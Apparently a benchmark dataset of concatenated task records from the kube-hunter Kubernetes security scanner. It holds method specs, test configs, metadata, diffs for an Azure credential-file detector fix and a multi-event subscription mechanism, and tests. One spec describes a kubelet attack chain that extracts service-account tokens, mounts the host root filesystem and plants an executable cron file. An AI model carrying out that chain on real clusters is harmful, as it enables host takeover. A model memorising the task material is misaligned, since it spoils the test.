Method: ProveAnonymousAuth.__init__(self, event) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: event – an instance of AnonymousAuthEnabled containing host and a requests‑Session. Outputs: Initializes the hunter, setting self.event and self.base_url derived from event.host. Description: Creates a ProveAnonymousAuth active‑hunter bound to the event that discovered anonymous kubelet access. Method: ProveAnonymousAuth.get_request(self, url, verify=False) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: url – full HTTPS URL to request; verify – bool (default False) to control SSL verification. Outputs: response body text stripped of trailing whitespace, or a string “Exception: …” on error. Description: Sends a GET request via the event’s session with a configured timeout and returns the raw text or an error marker. Method: ProveAnonymousAuth.post_request(self, url, params, verify=False) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: url – full HTTPS URL; params – dict of query parameters (e.g., {"cmd": "ls"}); verify – bool. Outputs: response body text stripped of trailing whitespace, or “Exception: …” on error. Description: Sends a POST request (used to invoke kubelet run commands) and returns the response text or an error marker. Method: ProveAnonymousAuth.has_no_exception(result) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: result – string returned from a request. Outputs: bool – True if the string does not contain “Exception: ”. Description: Helper that checks whether a request result indicates an exception. Method: ProveAnonymousAuth.has_no_error(result) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: result – string returned from a request. Outputs: bool – True if the string does not contain any known error substrings (e.g., “exited with”, “Permission denied”). Description: Detects generic command‑execution errors in kubelet responses. Method: ProveAnonymousAuth.has_no_error_nor_exception(result) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: result – string. Outputs: bool – True only if both has_no_error and has_no_exception are True. Description: Composite validator used throughout the hunter to confirm a clean command response. Method: ProveAnonymousAuth.execute(self) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: None (uses self.event and self.base_url). Outputs: Populates self.event.evidence with a summary of breached containers and publishes ExposedExistingPrivilegedContainersViaSecureKubeletPort if privileged containers are found. Description: Retrieves the pod list, extracts service‑account tokens and env vars from each container, and records evidence; also triggers the next active hunter. Method: MaliciousIntentViaSecureKubeletPort.__init__(self, event, seconds_to_wait_for_os_command=1) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: event – an ExposedExistingPrivilegedContainersViaSecureKubeletPort instance; seconds_to_wait_for_os_command – optional delay between OS commands (default 1 sec). Outputs: Initializes the hunter, setting base URL, timing knobs and retry counters. Description: Creates a hunter that will attempt to abuse privileged containers discovered by the previous hunter. Method: MaliciousIntentViaSecureKubeletPort.post_request(self, url, params, verify=False) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: url – HTTPS endpoint; params – dict of command parameters; verify – bool. Outputs: response text stripped of whitespace or “Exception: …” on error. Description: Sends a POST request through the event’s session (same semantics as ProveAnonymousAuth.post_request). Method: MaliciousIntentViaSecureKubeletPort.check_file_exists(self, run_request_url, file) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – base “run/…/container” URL; file – filename to test. Outputs: bool – True if an ls command reports the file without error/exception. Description: Determines whether a given file is present inside the target container. Method: MaliciousIntentViaSecureKubeletPort.rm_command(self, run_request_url, file_to_remove, number_of_rm_attempts, seconds_to_wait_for_os_command) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – container run URL; file_to_remove – path of the file; number_of_rm_attempts – retry count; seconds_to_wait_for_os_command – optional delay. Outputs: bool – True if the file was successfully removed (verified by a subsequent ls); otherwise False. Description: Attempts to delete a file via rm and verifies removal, retrying as configured. Method: MaliciousIntentViaSecureKubeletPort.rmdir_command(self, run_request_url, directory_to_remove, number_of_rmdir_attempts, seconds_to_wait_for_os_command) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – container run URL; directory_to_remove – target directory; number_of_rmdir_attempts – retries; seconds_to_wait_for_os_command – optional delay. Outputs: bool – True if the directory disappears after rmdir; otherwise False. Description: Attempts to delete a directory and confirms its removal. Method: MaliciousIntentViaSecureKubeletPort.get_root_values(self, command_line) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: command_line – string content of /proc/cmdline. Outputs: tuple (root_value, root_value_type) where root_value is the extracted root identifier (e.g., “mock”) and root_value_type is the prefix (e.g., “LABEL=”) or empty string; returns (None, None) if not found. Description: Parses kernel command‑line to locate a “root=” definition and separates its type and value. Method: MaliciousIntentViaSecureKubeletPort.process_exposed_existing_privileged_container(self, run_request_url, number_of_umount_attempts, number_of_rmdir_attempts, seconds_to_wait_for_os_command, directory_to_create=None) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – container run URL; number_of_umount_attempts, number_of_rmdir_attempts – retry limits; seconds_to_wait_for_os_command – optional delay; directory_to_create – optional custom mount point (default generated). Outputs: dict with keys result (bool), file_system_or_partition (str, when result True), directory_created (str, when result True). Description: Executes the full mount‑exploitation workflow: reads /proc/cmdline, resolves the root partition via findfs, creates a mount point, mounts the partition, reads the host’s /etc/hostname, and returns success information; cleans up on failure. Method: MaliciousIntentViaSecureKubeletPort.attack_exposed_existing_privileged_container(self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – container run URL; directory_created – mount point; number_of_rm_attempts – retries for cleanup; seconds_to_wait_for_os_command – optional delay; file_name – optional custom filename (defaults to a UUID‑based name). Outputs: dict with result (bool) and file_created (str when result True). Description: Attempts to create a file under /etc/cron.daily inside the mounted host filesystem, chmod it to executable, and returns success; on failure it removes the file. Method: MaliciousIntentViaSecureKubeletPort.execute(self, directory_to_create=None, file_name=None) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: directory_to_create – optional mount‑point name; file_name – optional payload filename. Outputs: Populates self.event.evidence with a human‑readable summary of successful or failed abuses. Description: Iterates over all privileged containers reported by the previous hunter, runs the mount‑exploitation workflow, performs the file‑creation attack, cleans up artifacts, and records the overall outcome.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/core/test_handler.py tests/hunting/test_kubelet.py" }
{ "num_modified_files": 3, "num_modified_lines": 573, "pr_author": "abdullahgarcia", "pr_labels": [], "llm_metadata": { "code": "B2", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md", "https://help.github.com/en/github/managing-your-work-on-github/closing-issues-using-keywords" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests two new active kubelet hunters to demonstrate foothold and malicious intent via the secure kubelet port. The provided tests expect concrete class names (ProveAnonymousAuth, MaliciousIntentViaSecureKubeletPort) and specific helper methods that were not mentioned in the issue description, indicating an implicit naming requirement. Because the tests introduce expectations not stated in the issue, the task is classified as B2 (implicit naming).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests import and use class ProveAnonymousAuth while the issue refers to FootholdViaSecureKubeletPort", "Tests validate numerous internal helper methods (e.g., get_request, post_request, has_no_error) that are not described in the issue", "Tests expect specific behavior and signatures not explicit in the issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ad4cfe1c11391f66b05df7e26f2059515f1f9988
2020-09-07 12:13:32
codecov[bot]: # [Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=h1) Report > Merging [#372](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=desc) into [master](https://codecov.io/gh/aquasecurity/kube-hunter/commit/3950a1c2f279a3372496e9369c12b3f2a852d5de?el=desc) will **decrease** coverage by `0.18%`. > The diff coverage is `0.00%`. [![Impacted file tree graph](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372/graphs/tree.svg?width=650&height=150&src=pr&token=hXSGvlUpkI)](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #372 +/- ## ========================================== - Coverage 62.77% 62.59% -0.19% ========================================== Files 42 42 Lines 2281 2286 +5 ========================================== - Hits 1432 1431 -1 - Misses 849 855 +6 ``` | [Impacted Files](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [kube\_hunter/modules/hunting/aks.py](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372/diff?src=pr&el=tree#diff-a3ViZV9odW50ZXIvbW9kdWxlcy9odW50aW5nL2Frcy5weQ==) | `33.89% <0.00%> (-3.14%)` | :arrow_down: | | [kube\_hunter/core/events/handler.py](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372/diff?src=pr&el=tree#diff-a3ViZV9odW50ZXIvY29yZS9ldmVudHMvaGFuZGxlci5weQ==) | `90.09% <0.00%> (-1.00%)` | :arrow_down: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=footer). Last update [3950a1c...64e2df2](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
aquasecurity__kube-hunter-372
diff --git a/kube_hunter/modules/hunting/aks.py b/kube_hunter/modules/hunting/aks.py index a5877c3..f937178 100644 --- a/kube_hunter/modules/hunting/aks.py +++ b/kube_hunter/modules/hunting/aks.py @@ -46,11 +46,16 @@ class AzureSpnHunter(Hunter): logger.debug("failed getting pod info") else: pods_data = r.json().get("items", []) + suspicious_volume_names = [] for pod_data in pods_data: - for container in pod_data["spec"]["containers"]: - for mount in container["volumeMounts"]: - path = mount["mountPath"] + for volume in pod_data["spec"].get("volumes", []): + if volume.get("hostPath"): + path = volume["hostPath"]["path"] if "/etc/kubernetes/azure.json".startswith(path): + suspicious_volume_names.append(volume["name"]) + for container in pod_data["spec"]["containers"]: + for mount in container.get("volumeMounts", []): + if mount["name"] in suspicious_volume_names: return { "name": container["name"], "pod": pod_data["metadata"]["name"],
fix azure spn hunter Fixes https://github.com/aquasecurity/kube-hunter/issues/370
**Title** Improve Azure SPN hunter to detect azure.json mounted via hostPath volumes **Problem** The Azure SPN hunter misses pods that expose the Azure credentials file when it is mounted through a hostPath volume, resulting in false‑negative findings. It can also error out when expected fields are absent. **Root Cause** Detection logic only examined container `volumeMount.mountPath` and ignored the underlying volume’s `hostPath`, and it assumed those fields were always present. **Fix / Expected Behavior** - Scan pod volumes for a `hostPath` that points to the Azure credentials file. - Collect the names of such volumes. - Report a container/pod match when a container mounts any of those suspicious volumes. - Gracefully handle missing `volumes` or `volumeMounts` fields. - Preserve existing behavior for direct `mountPath` matches. **Risk & Validation** - Add tests covering pods that use a hostPath volume for the credentials file and ensure they are detected. - Run the full test suite to confirm no regressions in other hunting modules. - Verify that pods without the suspicious setup are not falsely flagged.
372
aquasecurity/kube-hunter
diff --git a/tests/hunting/test_aks.py b/tests/hunting/test_aks.py new file mode 100644 index 0000000..008501a --- /dev/null +++ b/tests/hunting/test_aks.py @@ -0,0 +1,56 @@ +# flake8: noqa: E402 +import requests_mock + +from kube_hunter.conf import Config, set_config + +set_config(Config()) + +from kube_hunter.modules.hunting.kubelet import ExposedRunHandler +from kube_hunter.modules.hunting.aks import AzureSpnHunter + + +def test_AzureSpnHunter(): + e = ExposedRunHandler() + e.host = "mockKubernetes" + e.port = 443 + e.protocol = "https" + + pod_template = '{{"items":[ {{"apiVersion":"v1","kind":"Pod","metadata":{{"name":"etc","namespace":"default"}},"spec":{{"containers":[{{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{{"mountPath":"/mp","name":"v"}}]}}],"volumes":[{{"hostPath":{{"path":"{}"}},"name":"v"}}]}}}} ]}}' + + bad_paths = ["/", "/etc", "/etc/", "/etc/kubernetes", "/etc/kubernetes/azure.json"] + good_paths = ["/yo", "/etc/yo", "/etc/kubernetes/yo.json"] + + for p in bad_paths: + with requests_mock.Mocker() as m: + m.get("https://mockKubernetes:443/pods", text=pod_template.format(p)) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c + + for p in good_paths: + with requests_mock.Mocker() as m: + m.get("https://mockKubernetes:443/pods", text=pod_template.format(p)) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c == None + + with requests_mock.Mocker() as m: + pod_no_volume_mounts = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}],"volumes":[{"hostPath":{"path":"/whatever"},"name":"v"}]}} ]}' + m.get("https://mockKubernetes:443/pods", text=pod_no_volume_mounts) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c == None + + with requests_mock.Mocker() as m: + pod_no_volumes = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}]}} ]}' + m.get("https://mockKubernetes:443/pods", text=pod_no_volumes) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c == None + + with requests_mock.Mocker() as m: + pod_other_volume = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{"mountPath":"/mp","name":"v"}]}],"volumes":[{"emptyDir":{},"name":"v"}]}} ]}' + m.get("https://mockKubernetes:443/pods", text=pod_other_volume) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c == None
[ "tests/hunting/test_aks.py::test_AzureSpnHunter" ]
[]
Method: AzureSpnHunter.__init__(self, handler) Location: kube_hunter/modules/hunting/aks.py Inputs: - **handler** (ExposedRunHandler): an instance representing a reachable kubelet endpoint, providing host, port, and protocol attributes used to build request URLs. Outputs: - Instance of AzureSpnHunter properly initialised with the supplied handler; no return value. Description: Constructs the AzureSpnHunter hunter with a specific kubelet handler so that subsequent calls can query pod information on the target cluster. Method: AzureSpnHunter.get_key_container(self) Location: kube_hunter/modules/hunting/aks.py Inputs: - **self** (AzureSpnHunter): the hunter instance, which uses its stored handler to request `/pods` from the kubelet. Outputs: - **dict** containing `name` and `pod` keys when a container mounts a hostPath volume that could expose the Azure service‑principal JSON file, or **None** when no such container is found. Description: Scans the list of pods retrieved from the kubelet, identifies any hostPath volume that includes “/etc/kubernetes/azure.json”, and returns the first container that mounts that volume; otherwise signals no finding with None.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/hunting/test_aks.py" }
{ "num_modified_files": 1, "num_modified_lines": 8, "pr_author": "itaysk", "pr_labels": [], "llm_metadata": { "code": "B3", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": false, "B2": false, "B3": true, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/aquasecurity/kube-hunter/issues/370" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "security_bug" ], "reason": null, "reasoning": "The issue requests fixing the Azure SPN hunter but provides no details; the required behavior is inferred from an external issue URL and the accompanying test suite. The tests clearly define the expected detection logic, and the provided golden patch satisfies those assertions without introducing unrelated requirements. Because essential specifications reside in the external URL and are not quoted, the primary problem is an external dependency (B3).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
1a26653007ae2c82db04ac73a5d336f2336db772
2021-04-20 15:10:44
aquasecurity__kube-hunter-448
diff --git a/kube_hunter/core/events/handler.py b/kube_hunter/core/events/handler.py index 24eb1dc..667e88e 100644 --- a/kube_hunter/core/events/handler.py +++ b/kube_hunter/core/events/handler.py @@ -6,7 +6,7 @@ from threading import Thread from kube_hunter.conf import get_config from kube_hunter.core.types import ActiveHunter, HunterBase -from kube_hunter.core.events.types import Vulnerability, EventFilterBase +from kube_hunter.core.events.types import Vulnerability, EventFilterBase, MultipleEventsContainer logger = logging.getLogger(__name__) @@ -19,11 +19,33 @@ class EventQueue(Queue): self.active_hunters = dict() self.all_hunters = dict() - self.hooks = defaultdict(list) - self.filters = defaultdict(list) self.running = True self.workers = list() + # -- Regular Subscription -- + # Structure: key: Event Class, value: tuple(Registered Hunter, Predicate Function) + self.hooks = defaultdict(list) + self.filters = defaultdict(list) + # -------------------------- + + # -- Multiple Subscription -- + # Structure: key: Event Class, value: tuple(Registered Hunter, Predicate Function) + self.multi_hooks = defaultdict(list) + + # When subscribing to multiple events, this gets populated with required event classes + # Structure: key: Hunter Class, value: set(RequiredEventClass1, RequiredEventClass2) + self.hook_dependencies = defaultdict(set) + + # To keep track of fulfilled dependencies. we need to have a structure which saves historical instanciated + # events mapped to a registered hunter. + # We used a 2 dimensional dictionary in order to fulfill two demands: + # * correctly count published required events + # * save historical events fired, easily sorted by their type + # + # Structure: hook_fulfilled_deps[hunter_class] -> fulfilled_events_for_hunter[event_class] -> [EventObject, EventObject2] + self.hook_fulfilled_deps = defaultdict(lambda: defaultdict(list)) + # --------------------------- + for _ in range(num_worker): t = Thread(target=self.worker) t.daemon = True @@ -34,16 +56,66 @@ class EventQueue(Queue): t.daemon = True t.start() - # decorator wrapping for easy subscription + """ + ###################################################### + + ----------------- Public Methods ----------------- + + ###################################################### + """ + def subscribe(self, event, hook=None, predicate=None): + """ + The Subscribe Decorator - For Regular Registration + Use this to register for one event only. Your hunter will execute each time this event is published + + @param event - Event class to subscribe to + @param predicate - Optional: Function that will be called with the published event as a parameter before trigger. + If it's return value is False, the Hunter will not run (default=None). + @param hook - Hunter class to register for (ignore when using as a decorator) + """ + def wrapper(hook): self.subscribe_event(event, hook=hook, predicate=predicate) return hook return wrapper - # wrapper takes care of the subscribe once mechanism + def subscribe_many(self, events, hook=None, predicates=None): + """ + The Subscribe Many Decorator - For Multiple Registration, + When your attack needs several prerequisites to exist in the cluster, You need to register for multiple events. + Your hunter will execute once for every new combination of required events. + For example: + 1. event A was published 3 times + 2. event B was published once. + 3. event B was published again + Your hunter will execute 2 times: + * (on step 2) with the newest version of A + * (on step 3) with the newest version of A and newest version of B + + @param events - List of event classes to subscribe to + @param predicates - Optional: List of function that will be called with the published event as a parameter before trigger. + If it's return value is False, the Hunter will not run (default=None). + @param hook - Hunter class to register for (ignore when using as a decorator) + """ + + def wrapper(hook): + self.subscribe_events(events, hook=hook, predicates=predicates) + return hook + + return wrapper + def subscribe_once(self, event, hook=None, predicate=None): + """ + The Subscribe Once Decorator - For Single Trigger Registration, + Use this when you want your hunter to execute only in your entire program run + wraps subscribe_event method + + @param events - List of event classes to subscribe to + @param predicates - Optional: List of function that will be called with the published event as a parameter before trigger. + If it's return value is False, the Hunter will not run (default=None). + @param hook - Hunter class to register for (ignore when using as a decorator) + """ + def wrapper(hook): # installing a __new__ magic method on the hunter # which will remove the hunter from the list upon creation @@ -58,29 +130,160 @@ class EventQueue(Queue): return wrapper - # getting uninstantiated event object - def subscribe_event(self, event, hook=None, predicate=None): + def publish_event(self, event, caller=None): + """ + The Publish Event Method - For Publishing Events To Kube-Hunter's Queue + """ + # Document that the hunter published a vulnerability (if it's indeed a vulnerability) + # For statistics options + self._increase_vuln_count(event, caller) + + # sets the event's parent to be it's publisher hunter. + self._set_event_chain(event, caller) + + # applying filters on the event, before publishing it to subscribers. + # if filter returned None, not proceeding to publish + event = self.apply_filters(event) + if event: + # If event was rewritten, make sure it's linked again + self._set_event_chain(event, caller) + + # Regular Hunter registrations - publish logic + # Here we iterate over all the registered-to events: + for hooked_event in self.hooks.keys(): + # We check if the event we want to publish is an inherited class of the current registered-to iterated event + # Meaning - if this is a relevant event: + if hooked_event in event.__class__.__mro__: + # If so, we want to publish to all registerd hunters. + for hook, predicate in self.hooks[hooked_event]: + if predicate and not predicate(event): + continue + + self.put(hook(event)) + logger.debug(f"Event {event.__class__} got published to hunter - {hook} with {event}") + + # Multiple Hunter registrations - publish logic + # Here we iterate over all the registered-to events: + for hooked_event in self.multi_hooks.keys(): + # We check if the event we want to publish is an inherited class of the current registered-to iterated event + # Meaning - if this is a relevant event: + if hooked_event in event.__class__.__mro__: + # now we iterate over the corresponding registered hunters. + for hook, predicate in self.multi_hooks[hooked_event]: + if predicate and not predicate(event): + continue + + self._update_multi_hooks(hook, event) + + if self._is_all_fulfilled_for_hunter(hook): + events_container = MultipleEventsContainer(self._get_latest_events_from_multi_hooks(hook)) + self.put(hook(events_container)) + logger.debug( + f"Multiple subscription requirements were met for hunter {hook}. events container was \ + published with {self.hook_fulfilled_deps[hook].keys()}" + ) + + """ + ###################################################### + + ---------------- Private Methods ----------------- + + + ---------------- (Backend Logic) ----------------- + + ###################################################### + """ + + def _get_latest_events_from_multi_hooks(self, hook): + """ + Iterates over fulfilled deps for the hunter, and fetching the latest appended events from history + """ + latest_events = list() + for event_class in self.hook_fulfilled_deps[hook].keys(): + latest_events.append(self.hook_fulfilled_deps[hook][event_class][-1]) + return latest_events + + def _update_multi_hooks(self, hook, event): + """ + Updates published events in the multi hooks fulfilled store. + """ + self.hook_fulfilled_deps[hook][event.__class__].append(event) + + def _is_all_fulfilled_for_hunter(self, hook): + """ + Returns true for multi hook fulfilled, else oterwise + """ + # Check if the first dimension already contains all necessary event classes + return len(self.hook_fulfilled_deps[hook].keys()) == len(self.hook_dependencies[hook]) + + def _set_event_chain(self, event, caller): + """ + Sets' events attribute chain. + In here we link the event with it's publisher (Hunter), + so in the next hunter that catches this event, we could access the previous one's attributes. + + @param event: the event object to be chained + @param caller: the Hunter object that published this event. + """ + if caller: + event.previous = caller.event + event.hunter = caller.__class__ + + def _register_hunters(self, hook=None): + """ + This method is called when a Hunter registers itself to the handler. + this is done in order to track and correctly configure the current run of the program. + + passive_hunters, active_hunters, all_hunters + """ config = get_config() if ActiveHunter in hook.__mro__: if not config.active: - return - self.active_hunters[hook] = hook.__doc__ + return False + else: + self.active_hunters[hook] = hook.__doc__ elif HunterBase in hook.__mro__: self.passive_hunters[hook] = hook.__doc__ if HunterBase in hook.__mro__: self.all_hunters[hook] = hook.__doc__ + return True + + def _register_filter(self, event, hook=None, predicate=None): + if hook not in self.filters[event]: + self.filters[event].append((hook, predicate)) + logging.debug("{} filter subscribed to {}".format(hook, event)) + + def _register_hook(self, event, hook=None, predicate=None): + if hook not in self.hooks[event]: + self.hooks[event].append((hook, predicate)) + logging.debug("{} subscribed to {}".format(hook, event)) + + def subscribe_event(self, event, hook=None, predicate=None): + if not self._register_hunters(hook): + return + # registering filters if EventFilterBase in hook.__mro__: - if hook not in self.filters[event]: - self.filters[event].append((hook, predicate)) - logger.debug(f"{hook} filter subscribed to {event}") - + self._register_filter(event, hook, predicate) # registering hunters - elif hook not in self.hooks[event]: - self.hooks[event].append((hook, predicate)) - logger.debug(f"{hook} subscribed to {event}") + else: + self._register_hook(event, hook, predicate) + + def subscribe_events(self, events, hook=None, predicates=None): + if not self._register_hunters(hook): + return False + + if predicates is None: + predicates = [None] * len(events) + + # registering filters. + if EventFilterBase in hook.__mro__: + for event, predicate in zip(events, predicates): + self._register_filter(event, hook, predicate) + # registering hunters. + else: + for event, predicate in zip(events, predicates): + self.multi_hooks[event].append((hook, predicate)) + + self.hook_dependencies[hook] = frozenset(events) def apply_filters(self, event): # if filters are subscribed, apply them on the event @@ -97,36 +300,11 @@ class EventQueue(Queue): return None return event - # getting instantiated event object - def publish_event(self, event, caller=None): + def _increase_vuln_count(self, event, caller): config = get_config() - - # setting event chain - if caller: - event.previous = caller.event - event.hunter = caller.__class__ - - # applying filters on the event, before publishing it to subscribers. - # if filter returned None, not proceeding to publish - event = self.apply_filters(event) - if event: - # If event was rewritten, make sure it's linked to its parent ('previous') event - if caller: - event.previous = caller.event - event.hunter = caller.__class__ - - for hooked_event in self.hooks.keys(): - if hooked_event in event.__class__.__mro__: - for hook, predicate in self.hooks[hooked_event]: - if predicate and not predicate(event): - continue - - if config.statistics and caller: - if Vulnerability in event.__class__.__mro__: - caller.__class__.publishedVulnerabilities += 1 - - logger.debug(f"Event {event.__class__} got published with {event}") - self.put(hook(event)) + if config.statistics and caller: + if Vulnerability in event.__class__.__mro__: + caller.__class__.publishedVulnerabilities += 1 # executes callbacks on dedicated thread as a daemon def worker(self): diff --git a/kube_hunter/core/events/types.py b/kube_hunter/core/events/types.py index ef9afc0..6d9e036 100644 --- a/kube_hunter/core/events/types.py +++ b/kube_hunter/core/events/types.py @@ -62,6 +62,20 @@ class Event: return history +class MultipleEventsContainer(Event): + """ + This is the class of the object an hunter will get if he was registered to multiple events. + """ + + def __init__(self, events): + self.events = events + + def get_by_class(self, event_class): + for event in self.events: + if event.__class__ == event_class: + return event + + class Service: def __init__(self, name, path="", secure=True): self.name = name
Multiple Subscriptions Mechanism # Multiple Subscriptions A continuation for this old PR #271 When an hunter needs several prerequisites to exist in the cluster, We need to register for multiple events. This new mechanism allows us to execute once for every new combination of specified required events. For example: let a C hunter be registered to event A and B 1. event A was published 3 times 2. event B was published once. 3. event B was published again The hunter will execute 2 times: * (on step 2) with the newest version of A * (on step 3) with the newest version of A and newest version of B This allows us to run specific hunters multiple times with updated data, only when a minimum set of different events are published. ## Practical Changes This PR Adds: * A new decorator - `@handler.subscribe_many()` * Gets a list of events - `[Event1, Event2]` * A new type of event, `MultipleEventsContainer` which is passed to a hunter which subscribes using `subscribe_many` * implements `get_by_class` method, to get specific events from the container. * Unit Tests * Documentation to this and other backend logic Example can be seen in added Tests ## Fixed Issues #144 ## Contribution checklist - [x] I have read the Contributing Guidelines. - [x] The commits refer to an active issue in the repository. - [x] I have added automated testing to cover this case.
**Title** Add support for hunters that depend on multiple prerequisite events **Problem** Hunters could only listen to a single event type, making it impossible to trigger logic that requires a combination of different cluster conditions. This limited the ability to run certain checks only after all required information became available. **Root Cause** The event handling infrastructure tracked subscriptions per event class without any mechanism to aggregate multiple events or to determine when a full set of prerequisites had been satisfied. **Fix / Expected Behavior** - Introduce a new subscription method that allows a hunter to declare a list of required events. - Provide a container object that delivers the latest instances of each required event to the hunter when the set is complete. - Maintain internal bookkeeping to track which events have been published for each multi‑event hunter and to detect when all dependencies are fulfilled. - Preserve existing single‑event subscription behavior and filtering logic unchanged. - Update publishing flow to evaluate both single and multi‑event subscriptions, emitting hunters only when appropriate. **Risk & Validation** - Verify that hunters with multiple dependencies fire exactly once per new combination of events and receive the correct latest event data. - Ensure existing single‑event hunters and filters continue to operate without regression. - Run the added unit tests covering the new multi‑event flow and confirm all test suites pass.
448
aquasecurity/kube-hunter
